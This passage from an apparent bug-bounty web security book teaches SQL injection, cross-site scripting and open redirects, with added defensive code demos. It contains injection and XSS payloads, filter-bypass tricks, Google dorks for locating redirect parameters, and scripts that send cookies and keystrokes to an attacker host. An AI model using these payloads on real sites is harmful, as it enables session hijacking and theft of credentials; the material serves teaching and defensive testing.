• Use of operating system functions: Execute operating system commands through functions such as xp_cmdshell (in SQL Server).

Mitigation:
• Query parameterization: Use parameterized queries so that user input is never interpreted as SQL code.
• Input validation: Ensure that all input is valid.
• Principle of least privilege: Grant user accounts only the privileges necessary to perform their tasks.
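The keyword-obfuscation and URL-encoding bypasses from the Bypass protection section and the query-parameterization mitigation listed above, side by side in an added example (mine, not the book's). A hypothetical blocklist filter is matched against the raw value and against the value after the same normalization the web server and database will apply, and each payload is then run through a string-built query and a parameterized one. The filter, the tables and rows, and the function names are assumptions made for the demonstration; the three payloads are the book's.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed tables for the demonstration; nothing here comes from a real target.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
    CREATE TABLE products (id INTEGER, name TEXT, category TEXT);
    INSERT INTO products VALUES (1, 'Mug', 'Gifts');
""")

# A hypothetical blocklist filter of the kind the section describes: it rejects
# UNION SELECT in any case, but only when the keywords are separated by
# ordinary whitespace. This is the "before" case, not a recommended defense.
_BLOCKLIST = re.compile(r"union\s+select", re.IGNORECASE)


def naive_filter_allows(value: str) -> bool:
    """Matches the raw value exactly as it arrived on the wire."""
    return _BLOCKLIST.search(value) is None


def normalize_like_the_database(value: str) -> str:
    """Apply the transformations that happen between the filter and the SQL
    parser: URL-decode (the web server does this), drop block comments
    (SQLite, like other SQL dialects, treats /**/ as whitespace) and collapse
    whitespace runs."""
    decoded = unquote(value)
    without_comments = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.DOTALL)
    return re.sub(r"\s+", " ", without_comments)


def hardened_filter_allows(value: str) -> bool:
    """Same blocklist applied after normalization. It closes the two gaps
    shown here but is still a blocklist; parameterization is the real fix."""
    return _BLOCKLIST.search(normalize_like_the_database(value)) is None


def products_vulnerable(category: str) -> list:
    """String-built query: whatever the filter let through reaches the parser."""
    sql = f"SELECT name FROM products WHERE category = '{category}'"
    return [row[0] for row in _db.execute(sql)]


def products_safe(category: str) -> list:
    """Parameterized query: the value is bound as data, so obfuscation is moot."""
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in _db.execute(sql, (category,))]


# The book's three payloads.
ORIGINAL = "' UNION SELECT password FROM users--"
OBFUSCATED = "'/**/UnIoN/**/SeLeCt/**/password/**/FrOm/**/users--"
URL_ENCODED = "%27%20UNION%20SELECT%20password%20FROM%20users--"


if __name__ == "__main__":
    for label, payload in (("original", ORIGINAL), ("obfuscated", OBFUSCATED),
                           ("url-encoded", URL_ENCODED)):
        print(f"{label:12} naive={naive_filter_allows(payload)} "
              f"hardened={hardened_filter_allows(payload)}")
    print("string-built: ", products_vulnerable(OBFUSCATED))   # leaks both passwords
    print("parameterized:", products_safe(OBFUSCATED))         # []
```

The obfuscated payload passes the naive filter because /**/ is not whitespace to the regular expression, yet the database parses it as a valid UNION SELECT; the URL-encoded payload passes for the same reason and is decoded before the query is built. The parameterized query returns nothing for any of them, because the value never reaches the SQL parser.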

2.2 - CROSS-SITE SCRIPTING (XSS)

Cross-site scripting (XSS) is one of the most common and potentially damaging vulnerabilities found in web applications. In this chapter, I will explain what XSS is, how it works, and share some real-world examples that illustrate its impact. I will also share how I, Santiago Lopez, excelled at finding these bugs throughout my career.

Understanding cross-site scripting (XSS)

Cross-site scripting occurs when an attacker is able to inject malicious scripts into the content of trusted websites. XSS vulnerabilities can lead to unauthorized actions being performed in the context of another user's session, data theft or the spread of malware.

There are three main types of XSS:

• Stored XSS: The malicious script is stored on the target server, for example in a database, comment field or message board. When a user requests the stored information, the script is delivered as part of the response and executed by the user's browser.
• Reflected XSS: The malicious script is reflected off a web server, for example in an error message, search result, or any other response that includes data sent to the server as part of the request. The script is then executed by the user's browser.
• DOM-based XSS: The vulnerability exists in the client-side code rather than on the server side. The script is executed as a result of modifying the Document Object Model (DOM) of the web page.

Real-world examples

Let's look at some real-world examples of XSS vulnerabilities to understand how they work and the potential damage they can cause.

Example 1: Stored XSS in a comment field

Imagine a blogging platform where users can leave comments on posts. An attacker could post a comment like this:

--------------------
<script>alert('XSS');</script>
--------------------

If the platform does not properly sanitize the input, this script will be stored in the database and displayed on the page every time a user views the comments section. When executed, an "XSS" alert box is displayed.

Example 2: Reflected XSS in a search function

Consider a web application with a search feature that displays the search query back to the user. An attacker could craft a URL like this:

--------------------
http://example.com/search?q=<script>alert('XSS');</script>
--------------------

If the application reflects the search term without proper encoding, the script will be executed by the browser, displaying an "XSS" alert box.
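To make the encoding point in Example 2 concrete, an added example (my code, not the book's): a constructed search-page template for the hypothetical example.com application reflects the q parameter into three contexts, rendered once the vulnerable way and once with the encoding each context needs, plus a small HTMLParser-based check a tester can run over the output instead of eyeballing it. The last function is a filter with the kind of logic error discussed later in this chapter: it strips script tags in a single pass, so a nested payload reassembles into a working tag. The template, the payloads and all function names are assumptions.

```python
import html
import json
import re
from html.parser import HTMLParser

# Constructed template for the hypothetical example.com search page. The
# query lands in three contexts: HTML text, a quoted attribute value and a
# JavaScript string literal inside a <script> block.
TEMPLATE = """<p>Results for: {body}</p>
<input type="text" name="q" value="{attr}">
<script>var lastQuery = {js};</script>"""


def render_search_vulnerable(q: str) -> str:
    """Example 2's bug: q is dropped into every context without encoding."""
    return TEMPLATE.format(body=q, attr=q, js='"' + q + '"')


def js_string_literal(s: str) -> str:
    """Encode s as a JavaScript string literal that is also safe inside a
    <script> block. json.dumps escapes quotes, backslashes and newlines; the
    extra replacements keep '</script>' and '<!--' away from the HTML
    tokenizer, which knows nothing about JavaScript strings."""
    literal = json.dumps(s)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_search_safe(q: str) -> str:
    """Contextual output encoding: one rule per context."""
    return TEMPLATE.format(
        body=html.escape(q, quote=False),  # &, <, > are enough in text content
        attr=html.escape(q, quote=True),   # quotes must go too inside an attribute
        js=js_string_literal(q),
    )


_SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)


def strip_script_tags_once(q: str) -> str:
    """A filter with a logic error: it removes <script> and </script> in a
    single pass, so a nested payload reassembles into the tag it removed."""
    return _SCRIPT_TAG.sub("", q)


class _TagAudit(HTMLParser):
    """Counts <script> start tags and collects on* attribute names the way the
    browser's tokenizer would see them, so an encoding mistake shows up as
    structure rather than as a substring."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def audit(page: str) -> tuple:
    """Return (number of <script> tags, list of on* attribute names).
    The template legitimately contains exactly one <script>."""
    parser = _TagAudit()
    parser.feed(page)
    parser.close()
    return parser.script_tags, parser.handlers


if __name__ == "__main__":
    payloads = ("<script>alert('XSS')</script>",        # text context
                '" onmouseover="alert(1)',               # attribute context
                "</script><script>alert(1)</script>",    # JavaScript context
                strip_script_tags_once("<scr<script>ipt>alert(1)</scr</script>ipt>"))
    for p in payloads:
        print(repr(p), audit(render_search_vulnerable(p)), audit(render_search_safe(p)))
```

The three payloads each break out of a different context, which is why a single "escape the angle brackets" rule is not enough: the attribute payload contains no angle brackets at all, and the JavaScript payload is harmless as HTML text but closes the script block. Encoding per context brings every case back to the template's single script tag and no event handlers.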

Example 3: DOM-based XSS in client-side JavaScript

Suppose a website has a JavaScript function that reads a parameter from the URL and writes it to the page:

--------------------
var searchParam = new URLSearchParams(window.location.search).get('q');
document.write(searchParam);
--------------------

An attacker could use a URL like this one:

--------------------
http://example.com/?q=<script>alert('XSS');</script>
--------------------

Since the parameter is written directly to the page without sanitization, the script will be executed by the browser, displaying the alert box.

My success with finding XSS bugs

Throughout my career, I have identified numerous XSS vulnerabilities, which have been both challenging and rewarding. Finding XSS bugs requires a keen eye for detail and a deep understanding of how web applications handle user input.

One of my most notable successes was the discovery of a stored XSS vulnerability in a major social networking platform. The vulnerability was located in the profile description field, where users could enter text to describe themselves. By crafting a carefully constructed payload, I demonstrated how an attacker could inject malicious scripts that would execute every time someone viewed the affected profile. This bug could have been exploited to steal session cookies, perform actions on behalf of other users, or spread malware.

Another significant finding was a reflected XSS vulnerability on a popular e-commerce site. The search function reflected user input without proper encoding, allowing me to inject scripts that ran in the browser of anyone who clicked on a specially crafted link. This vulnerability had the potential to hijack user sessions and manipulate user data.

XSS vulnerability prevention

To prevent XSS vulnerabilities, web developers should:

• Sanitize input: Always sanitize user input by removing or encoding special characters that could be used in scripts.
• Use security libraries: Use security libraries and frameworks that provide built-in protection against XSS.
• Content Security Policy (CSP): Apply a content security policy to restrict the sources from which scripts can be loaded and executed.

Cross-site scripting is a powerful vulnerability that can have serious consequences if left unchecked. By understanding how XSS works and learning from real-world examples, you can better protect web applications from these attacks. Throughout my career, finding and reporting XSS vulnerabilities has been one of my specialties, leading to significant improvements in the security of various platforms.

Once the page is detected as vulnerable to XSS, the payload will be displayed in the browser like this.

Types of XSS

1. Reflected XSS

Reflected XSS is the most basic type of XSS. It occurs when user-supplied data is included in the server's HTTP response without being properly validated or encoded. The attacker tricks the victim into clicking on a malicious link or submitting a manipulated form, which causes the malicious script to execute in the victim's browser.

Characteristics:

• The malicious script is not stored on the server.
• The attack is executed immediately after the victim interacts with the link or form.
• The impact is limited to the victim's current session.

Example:

https://example.com/search?q=<script>alert('XSS')</script>

In this example, the attacker includes a <script> tag in the search parameter q. If the web application does not validate or encode this parameter, the script will be executed in the victim's browser when they click on the link.

2. Stored XSS

Stored XSS is a more dangerous type of XSS. It occurs when user-supplied data is stored on the server (e.g., in a database) and then included in HTTP responses without being properly validated and encoded. The malicious script is executed each time a user visits the affected page, which can affect multiple users.

Characteristics:

• The malicious script is stored on the server.
• The attack is executed every time the affected page is loaded in any user's browser.
• The impact can be much greater than that of reflected XSS, as it can affect multiple users over an extended period.

Example:

An attacker could inject a malicious script into a forum comment or blog post. This script would be stored in the database and executed every time someone viewed the comment or post.

3. DOM-based XSS

DOM-based XSS is a type of XSS that occurs client-side, in the victim's browser. The malicious script is not sent to the server, but is executed directly in the browser through manipulation of the page's Document Object Model (DOM).

Characteristics:

• The malicious script is not sent to the server.
• The attack is executed in the victim's browser through DOM manipulation.
• It can be more difficult to detect and prevent than other types of XSS, as it does not involve interaction with the server.

Example:

https://example.com/page#<script>alert('XSS')</script>

In this example, the attacker places the script in the URL fragment (the part after #), which the browser does not send to the server. If the web application's client-side code uses this value to update the page content dynamically without proper validation and encoding, the script will be executed in the victim's browser.

Understanding the different types of XSS is essential to identifying and preventing them. Each type of XSS has its own characteristics and requires different mitigation approaches. By applying security best practices, such as input validation and output encoding, the use of Content Security Policy (CSP) and the implementation of HttpOnly cookies, you can protect your web application and your users from XSS attacks.

Search methodologies

We will explore the techniques and tools used by security researchers to discover these vulnerabilities in web applications.

Hunting for XSS requires a methodical and systematic approach. Below is a general methodology you can follow:

1. Reconnaissance:
• Gather information about the target web application, such as its technology, functionality and structure.
• Identify possible entry points for user-supplied data, such as forms, search fields and URL parameters.

2. Source code analysis:
• If possible, review the application's source code for code patterns vulnerable to XSS, such as direct concatenation of unvalidated data into HTML output.

3. Manual testing:
• Try injecting basic XSS payloads at the identified entry points. Start with simple payloads like <script>alert('XSS')</script> and see if they execute in the browser.
• Experiment with different types of encoding (URL, HTML, JavaScript) and evasion techniques to bypass security filters.

4. Automated scanning:
• Use web vulnerability scanning tools such as Burp Suite, OWASP ZAP or Nikto to automate the search for XSS.
• Configure the tools to scan the relevant entry points and use predefined XSS payload lists.

5. Analysis of results:
• Review the scan results and manual tests to identify potential XSS vulnerabilities.
• Manually verify each finding to confirm that it is a real vulnerability and not a false positive.

Tools & Techniques

• Burp Suite: A set of web security tools that includes an intercepting proxy, a vulnerability scanner and a request repeater. It is widely used by security researchers to perform penetration testing and look for XSS vulnerabilities.
• OWASP ZAP: An open source web vulnerability scanner that can identify a wide range of vulnerabilities, including XSS. It is easy to use and offers an intuitive graphical interface.
• Nikto: A command-line web vulnerability scanner that can perform fast, automated testing. It is useful for scanning large numbers of websites for common vulnerabilities.
• XSS Hunter: A platform that allows you to create custom XSS payloads that send alerts to your account when executed in the victim's browser. It is useful for detecting blind XSS vulnerabilities, where you cannot directly see the result of the injection.
• PayloadsAllTheThings: A GitHub repository containing a large collection of XSS payloads that you can use in your tests.

Tips and Tricks

• Don't limit yourself to basic payloads: Experiment with different types of payloads and evasion techniques to find vulnerabilities that other researchers might miss.
• Pay attention to the context: The context in which the injected data lands is crucial in determining whether it is exploitable as XSS. Try different contexts, such as HTML attributes, JavaScript event handlers and JavaScript variable values.
• Use debugging tools: Tools such as the browser's developer console can help you analyze how your payload is processed and executed in the victim's browser.
• Learn from other researchers: Follow security blogs and forums, attend conferences and participate in online communities to learn from other researchers and keep up to date with the latest techniques and tools.

XSS hunting is a constant challenge, but it is also a very rewarding skill. By mastering the techniques and tools presented

in this chapter, you will be well on your way to becoming an expert at detecting and preventing this critical vulnerability.

Bypass XSS protection

We will explore the advanced techniques attackers use to bypass XSS protections and how defenders can fortify their web applications against these attacks.

XSS evasion techniques

Attackers employ a variety of techniques to evade XSS filters and protections:

1. Code obfuscation: Attackers can obfuscate their malicious code to make it less recognizable to XSS filters. This can include the use of encoding (URL, HTML, JavaScript), special characters and JavaScript obfuscation techniques such as the use of arrays, the eval() function and regular expressions.
2. HTML manipulation: Attackers can modify the HTML structure of a page to create new contexts for code execution. For example, they can insert event attributes into existing HTML tags or create new tags with on* attributes (such as onmouseover, onload, etc.) to execute their malicious code.
3. DOM-based attacks: Attackers can exploit vulnerabilities in the application's JavaScript code to inject malicious code into the page's DOM (Document Object Model). This can include manipulating events, modifying attributes of HTML elements and creating new elements.
4. Split payloads: Attackers can split their XSS payload into multiple parts and send them in different requests or through different channels (e.g. cookies, HTTP headers). This can make it difficult for XSS filters to detect the entire payload.
5. Browser-based attacks: Attackers can exploit vulnerabilities in web browsers to execute their malicious code. This can include the use of zero-day exploits, vulnerable plugins or poorly implemented browser features.

Strengthening XSS defenses

To protect against XSS attacks, it is crucial to implement a layered defense:

1. Strict input validation: Validate all user-supplied data on the server side, ensuring that it complies with the expected formats and types. Use whitelists to allow only specific characters and values.
2. Contextual output encoding: Encode all data displayed to the user, using the encoding appropriate to each context (HTML, JavaScript, CSS, URL, etc.).
3. Content Security Policy (CSP): Implement a strict CSP to control which scripts, styles and other resources can be loaded and executed in your web application.
4. HttpOnly cookies: Set the HttpOnly attribute on session cookies to prevent them from being accessed by JavaScript.
5. Software updates: Keep your software up to date, including frameworks, libraries and web browsers, to fix known vulnerabilities.
6. WAF (Web Application Firewall): Consider using a WAF to detect and block known and suspected XSS attacks.
7. Security testing: Perform regular penetration tests and vulnerability scans to identify and fix XSS vulnerabilities before they can be exploited.

Hunting XSS is a constant challenge, as attackers continue to develop new evasion techniques. By understanding these techniques and strengthening your defenses, you can protect your web application and your users from XSS attacks. Remember that security is an ongoing process, and you should always be on the lookout for new threats and vulnerabilities.

Filtering logic errors

We will explore a specific type of XSS vulnerability that arises from errors in the logic of the security filters implemented in web applications. These errors, although often overlooked, can be exploited by attackers to bypass XSS protections and execute malicious code in users' browsers.

What are filter logic errors in XSS?

Filter logic errors in XSS occur when the security filters designed to prevent the injection of malicious scripts contain flaws in

50 MILLIONAIRE RECORDS
their design or implementation. These flaws can allow attackers
to bypass the filters using techniques such as:
• Alternative encoding: Attackers can use different encoding schemes (URL, HTML, JavaScript) to represent special characters that would normally be blocked by filters.
• HTML structure manipulation: Attackers can insert HTML tags or attributes that are not properly filtered, creating new execution contexts for their malicious code.
• Injection in event attributes: Attackers can inject JavaScript code into event attributes (such as onclick, onmouseover, etc.) that are executed when the user interacts with the page.
• Multi-sequence attacks: Attackers can split their XSS payload into multiple parts and send them in different requests or through different channels, thus evading filters that look for specific patterns.
• Browser-based attacks: Attackers can exploit vulnerabilities in web browsers to execute malicious code that would not be blocked by server-side filters.

Examples of Filter Logic Errors in XSS

Example 1: Keyword-based filtering

A simple XSS filter could look for keywords such as "script", "alert" or "onload" and block any input containing them. However, an attacker could bypass this filter by using HTML encoding (&#x73;cript, &#x61;lert, &#x6f;nload) or by using alternative keywords (eval, setTimeout, etc.).

Example 2: HTML tag-based filter

A more sophisticated filter could attempt to remove all HTML tags from the user input. However, an attacker could use event attributes on allowed HTML tags (such as <img onerror="alert('XSS')">) or create new tags with on* attributes to execute their malicious code.

Example 3: Filtering based on regular expression patterns

An even more complex filter could use regular expressions to identify and block malicious code patterns. However, attackers can find ways to bypass these regular expressions using special characters, encoding or obfuscation techniques.

XSS filter logic errors can be difficult to detect and prevent, but they are a real threat to web application security. By understanding how these bugs work and following security best practices, you can protect your application and your users from XSS attacks. Remember that security is an ongoing process, and you should always be on the lookout for new vulnerabilities and attack techniques.

web vulnerabilities 51
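The three filter examples share one root cause: they try to recognise attacks in the input instead of neutralising the input at output time. The following is an added example, not code from the book, that puts the keyword denylist of Example 1 beside contextual HTML output encoding and runs both over the inputs the text mentions; all sample inputs are constructed for the demonstration.

```javascript
// Added example (not from the book). Compares the keyword-based filter of
// Example 1 with contextual output encoding. All sample inputs are constructed.

// Flawed approach: a keyword denylist applied to the raw input.
const DENYLIST = ['script', 'alert', 'onload'];

function keywordFilterAllows(input) {
  const lower = input.toLowerCase();
  return !DENYLIST.some((word) => lower.includes(word));
}

// Sound approach for the HTML body context: encode every character the
// HTML parser gives meaning to, so whatever the input is, it renders as text.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

function encodeForHtml(input) {
  return input.replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// After encoding, no '<' survives, so no tag and no on* attribute can be formed.
function rendersAsInertText(html) {
  return !html.includes('<');
}

// Inputs from the text, plus a harmless string the denylist rejects.
const SAMPLES = {
  plainScript: '<script>alert(1)</script>',
  entityEncoded: '<&#x73;cript>&#x61;lert(1)</&#x73;cript>', // hides "script" from the denylist
  eventAttribute: '<img onerror="alert(\'XSS\')">',          // the Example 2 payload
  alternativeKeyword: '<img src=x onerror="eval(1)">',       // no denylisted word at all
  legitimate: 'Product description',                         // "description" contains "script"
};

// Returns, per sample, what the denylist decides and whether the encoded
// output is inert. The denylist both misses attacks and blocks legitimate
// text; encoding makes every sample inert without trying to recognise attacks.
function compare(samples = SAMPLES) {
  const out = {};
  for (const [name, input] of Object.entries(samples)) {
    out[name] = {
      denylistAllows: keywordFilterAllows(input),
      encodedIsInert: rendersAsInertText(encodeForHtml(input)),
    };
  }
  return out;
}
```

Note that encoding is context specific: the table above is correct for text inside an HTML element, while data placed into a JavaScript string, a URL or a CSS value needs the encoder for that context.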
Escalating the attack

Once an attacker has discovered an XSS vulnerability in a website, their primary goal is usually to go beyond simple code injection and exploit it to the fullest extent possible. This chapter explores the advanced techniques and strategies that attackers use to escalate their XSS attacks and cause a greater impact.

1. Session and Cookie Theft

• Objective: To hijack the session of a legitimate user in order to impersonate them.
• Technique: Inject an XSS script that captures the user's session cookies and sends them to the attacker.

Example:

JavaScript

<script>
// document.cookie only exposes cookies that are not marked HttpOnly
var cookies = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://website-attacker.com/steal-cookies', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('cookies=' + encodeURIComponent(cookies));
</script>

2. Keylogging

• Purpose: To record user keystrokes to capture sensitive information (passwords, credit card data, etc.).
• Technique: Inject an XSS script that logs each keystroke and sends the data to the attacker.

Example:

JavaScript

<script>
// runs for every keystroke on the page and forwards the key code
document.onkeypress = function(e) {
  var key = (window.event) ? e.keyCode : e.which;
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://website-attacker.com/keylogger', true);
  xhr.send('key=' + key);
};
</script>

3. Phishing Attacks

• Objective: To trick users into revealing confidential information.
• Technique: Inject an XSS script that displays a fake pop-up window that mimics the appearance of the legitimate website and requests sensitive data.

Example:

JavaScript

<script>
window.onload = function() {
  var overlay = document.createElement('div');
  overlay.innerHTML = '<div style="...">Enter your bank details:</div>';
  document.body.appendChild(overlay);
};
</script>

4. Propagation of XSS to Other Users

• Objective: Amplify the attack by infecting other users of the website.
• Technique: Use stored XSS to inject malicious code into areas of the site where other users will see it, such as forums or comments.
5. XSS on Trusted Sites

• Objective: To take advantage of the trust that users have in a legitimate site to carry out more effective attacks.
• Technique: Inject XSS into a highly reputable website and redirect users to malicious sites or display misleading content.

6. Escalation of Privileges

• Purpose: To gain access to restricted functions and data that the current user should not have access to.
• Technique: Use XSS to manipulate client-side logic and perform actions on behalf of the user without their knowledge.

Defenses against XSS Escalation Attacks

• Input validation: Implement strict validation of all user input to prevent malicious code injection.
• Output encoding: Correctly encode the data before displaying it in the browser to prevent it from being interpreted as code.
• Content Security Policy (CSP): Restrict the sources from which content can be loaded into the website.
• WAF (Web Application Firewall): Use a WAF to detect and block XSS attacks.
Automated XSS

Manually searching for XSS vulnerabilities can be a tedious and time-consuming process. Fortunately, automation tools and techniques exist that allow security researchers to scale their efforts and discover XSS more efficiently. This chapter explores how to automate XSS hunting, from reconnaissance to exploitation.

1. Automated Reconnaissance

1. Objective: Identify possible entry points for XSS on a web site.
2. Tools:
• Web crawlers: Crawl the website automatically, collecting URLs and parameters. Examples: Burp Suite Spider, ZAP Spider.
• Vulnerability scanners: Look for known XSS patterns in web pages. Examples: Nikto, OWASP ZAP.
• Fuzzers: Send malicious inputs to website parameters to test if they are vulnerable to XSS. Examples: Wfuzz, ffuf.

Example: Use a web crawler to collect all the URLs of a website, then use a vulnerability scanner to scan each page for XSS.

2. Automated Payload Generation

1. Objective: Create custom XSS payloads to evade filters and maximize impact.
2. Tools:
• XSS payload generators: Generate XSS payloads based on different contexts and encoding techniques. Examples: XSS Hunter, XSSer.
• Payload lists: Compilations of known and effective XSS payloads.

Example: Use a payload generator to create an XSS payload that executes even if it is encoded in HTML.

3. Automated Injection and Testing

1. Objective: Inject XSS payloads in the identified entry points and verify if they are executed.
2. Tools:
• Penetration test frameworks: Automate the injection and testing of XSS payloads. Examples: Burp Suite Intruder, ZAP Active Scan.
• Custom scripts: Develop scripts to automate specific tasks, such as injecting payloads into forms.

Example: Use Burp Suite Intruder to inject a list of XSS payloads into a search parameter and analyze the responses to detect if any are executed.

4. Automated Monitoring and Alerting

1. Objective: Receive real-time notifications when an XSS is discovered.
2. Tools:
• XSS Hunter: Platform to generate XSS payloads and receive alerts when they are triggered.
• Burp Collaborator: Tool to detect interactions with XSS payloads trying to communicate with external servers.

Example: Use XSS Hunter to generate an XSS payload and receive an email alert when a user visits a page containing the payload.

5. Integration with Development Workflows

1. Objective: Incorporate XSS detection in the software development process.
2. Tools:
• SAST (Static Application Security Testing): Analyzes source code for XSS vulnerabilities. Examples: SonarQube, Checkmarx.
• DAST (Dynamic Application Security Testing): Performs security tests on the running application to detect XSS.

Example: Integrate a SAST scanner into the software build process to detect and fix XSS vulnerabilities before the application is deployed.

Legal and Ethical Considerations

Automating XSS hunting should be done in a responsible and ethical manner. It is important to obtain proper permission before testing on third-party websites and to avoid causing damage or disruption.
Tips for finding your first XSS

• Start with the basics: Practice with simple XSS payloads and learn to identify common patterns of vulnerabilities.
• Use tools: There are many tools available that can help you automate the search for XSS, such as vulnerability scanners and fuzzers.
• Learn from others: Read vulnerability reports, blogs and tutorials to learn the latest XSS techniques and strategies.
• Don't give up: Finding your first XSS may take time and patience, but the rewards of discovering a real vulnerability are priceless.
2.3 - OPEN REDIRECT

Open redirects are a type of vulnerability that occurs when a web application accepts user-controlled input to redirect the user to a specified URL, but does not properly validate or sanitize this input. This can lead to phishing attacks and other malicious activity. In this chapter, we will explore what open redirects are, how they work, and provide real-world examples that illustrate their impact.

Understanding open redirects

An open redirect occurs when an application includes user-controlled data in a URL redirect without proper validation. Attackers can exploit this by creating URLs that redirect users to malicious websites, making it easy to trick them.

Real-world examples

Let's examine some real-world examples to understand how open redirects work and the potential risks they pose.

Example 1: Open Redirect on a login page

Let's imagine a website with a login form that includes a "next" parameter in the URL to redirect users to a specific page after logging in:

--------------------
http://example.com/login?next=http://example.com/dashboard
--------------------

An attacker can exploit this by changing the "next" parameter to a malicious site:

--------------------
http://example.com/login?next=http://malicious.com
--------------------

If the application does not validate the "next" parameter, it will redirect users to the malicious site after logging in.

Example 2: Open Redirect in a marketing e-mail

Consider a marketing email that includes a link to a promotional offer with a redirect parameter:

--------------------
http://example.com/offer?redirect=http://example.com/thankyou
--------------------

An attacker could modify the redirect parameter to point to a phishing site:

--------------------
http://example.com/offer?redirect=http://phishing.com
--------------------

When users click on the link, they are redirected to the phishing site, which may look like the legitimate site and ask them to enter sensitive information.

Example 3: Open Redirect in a URL shortening service

Many URL shorteners take a URL as input and redirect users to the destination. An open redirect vulnerability can occur if the service does not properly validate the input URL:

--------------------
http://shortener.com/?url=http://example.com
--------------------

An attacker could create a shortened URL that redirects to a malicious site:

--------------------
http://malicious.com/?url=http://malice.com
--------------------

Users clicking on the shortened URL would be redirected to the malicious site.
Risks and impacts

Open redirects can lead to several serious risks:

1. Phishing attacks: Attackers can create URLs that appear to be from a trusted source, but redirect users to phishing sites, where they can steal login credentials or other sensitive information.
2. Malware distribution: Users can be redirected to sites hosting malware, leading to their devices being compromised.
3. Loss of trust: If users are frequently redirected to malicious sites from a trusted web application, it can damage the organization's reputation.

Preventing open redirects

To avoid open redirects, web developers should:

1. Validate and sanitize input: Ensure that any user-controlled input used in redirects is properly validated and sanitized.
2. Use whitelists: Apply whitelists of URLs allowed for redirects. Only allow redirects to URLs that are explicitly listed and trusted.
3. Avoid user-controlled redirects: Whenever possible, avoid using user-controlled input to redirect altogether.

Secure code examples:

// Input validation
$url = $_GET['url'];
// Require a syntactically valid URL on the allowed host. The (\/|$) boundary
// after the host name stops a longer host such as
// https://legitimate-site.com.evil.com from matching the prefix.
if (!filter_var($url, FILTER_VALIDATE_URL) || !preg_match('/^https:\/\/legitimate-site\.com(\/|$)/', $url)) {
    die("Invalid URL");
}

// Server-side redirection
header("Location: $url");
exit;

Open redirects are a common and potentially dangerous vulnerability that can lead to phishing attacks, malware distribution and loss of user trust. By understanding how open redirects work and learning from real-world examples, you can better protect web applications from these attacks. Always validate and sanitize user input, use whitelists and minimize user-controlled redirects to mitigate the risks associated with open redirects.
Find your first Open Redirect

What are open redirects?

An open redirect occurs when a web application accepts uncontrolled parameters that specify the destination URL of a redirect. This allows attackers to build links that appear to come from the legitimate website, but actually redirect users to malicious sites.

Examples of open redirects:

• URL parameters:

https://sitio-legitimo.com/redirect.php?url=https://site-malicious.com

• Parameters in forms:

HTML

<form action="/redirect.php" method="POST">
<input type="hidden" name="url" value="https://site-malicious.com">
</form>

How to find open redirects?

• Manual analysis of the source code: Search for parameters that control redirects and verify if they are properly validated.
• Security analysis tools: Use web vulnerability scanners such as OWASP ZAP or Burp Suite to identify open redirects.
• Google Dorking: Look for URL patterns that may indicate the presence of open redirects. For example: site:site-legitimate.com inurl:redirect

How to exploit open redirects?

Once an open redirect is identified, an attacker can build a malicious link that redirects users to a website controlled by the attacker. This link can be distributed via email, social networks, forums, etc.

Using Google Dorks to Find Additional Redirect Parameters

Redirect parameters on websites are a common target for Cross-Site Scripting (XSS) attacks. These parameters are often not properly protected, allowing attackers to inject malicious code that executes in the victim's browser. In this chapter, we will explore how to use Google Dorks, a powerful technique for searching Google for specific information, to discover vulnerable redirect parameters on websites.

What are Google Dorks?

Google Dorks are special search queries that use advanced operators to refine search results. These operators allow you to search for specific file types, keywords in specific locations on a web page, and even known vulnerabilities.

Finding Redirect Parameters with Google Dorks

To find redirection parameters, we can use the following Google Dorks:

• inurl: Searches for a specific keyword in a web page URL.
• site: Narrows the search to a specific web site.

By combining these operators, we can create dorks like the following:

• inurl:redirect site:.gov
• inurl:url site:.edu
• inurl:return site:.com
• inurl:redir site:.org

These dorks will look for parameters such as "redirect", "url", "return" and "redir" on government (.gov), educational (.edu), commercial (.com) and organization (.org) websites.
Practical Examples

Suppose we find the following result using one of our dorks:

https://www.example.com/redirect.php?url=https://www.google.com

In this case, the "url" parameter is a redirect parameter. We can test if it is vulnerable to XSS by injecting a basic payload such as:

https://www.example.com/redirect.php?url=https://www.google.com<script>alert(1)</script>

If the website is vulnerable, we will see a pop-up alert with the number "1".

Additional Tips

• Try different dork combinations: Experiment with different keywords and operators to find more redirect parameters.
• Use automated tools: There are tools that automate the search for redirect parameters using Google Dorks.
• Be ethical: Use this technique only on websites that have given you permission for security testing.

Precautions

• Not all redirection parameters are vulnerable: Some websites implement security measures to protect against XSS.
• Google may block your IP address: If you perform too many searches in a short period of time, Google may temporarily block your IP address.

Bypass protection

Open redirect vulnerabilities allow attackers to manipulate a website's redirect logic to send users to malicious destinations. Although many sites implement protections to prevent this type of attack, persistent attackers often find ways to evade these defenses. This chapter explores common techniques used to circumvent open redirect protection and how defenders can strengthen their security measures.

1. Character encoding and URL obfuscation

• Purpose: To hide the true nature of the redirection destination using character encoding or obfuscation techniques.
• Techniques:
• URL encoding: Replace special characters in the URL with their encoded equivalents (e.g. %2F for /).
• Double encoding: Encode the URL several times to evade simple filters.
• Domain obfuscation: Using similar Unicode characters to create domains that appear legitimate (for example, xn--pple-43d.com for apple.com).
• Example:

https://website-vulnerable.com/redirect?url=https%3A%2F%2Fwebsite-vulnerable.com

2. Parameter abuse and validation logic

• Objective: To exploit errors in the implementation of the redirection validation logic.
• Techniques:
1. Parameter manipulation: Modify unexpected parameters to bypass filters.
2. Injecting special characters: Entering characters such as blank spaces or new lines to alter the URL validation.
3. Redirect chains: Use multiple redirects to hide the final destination.
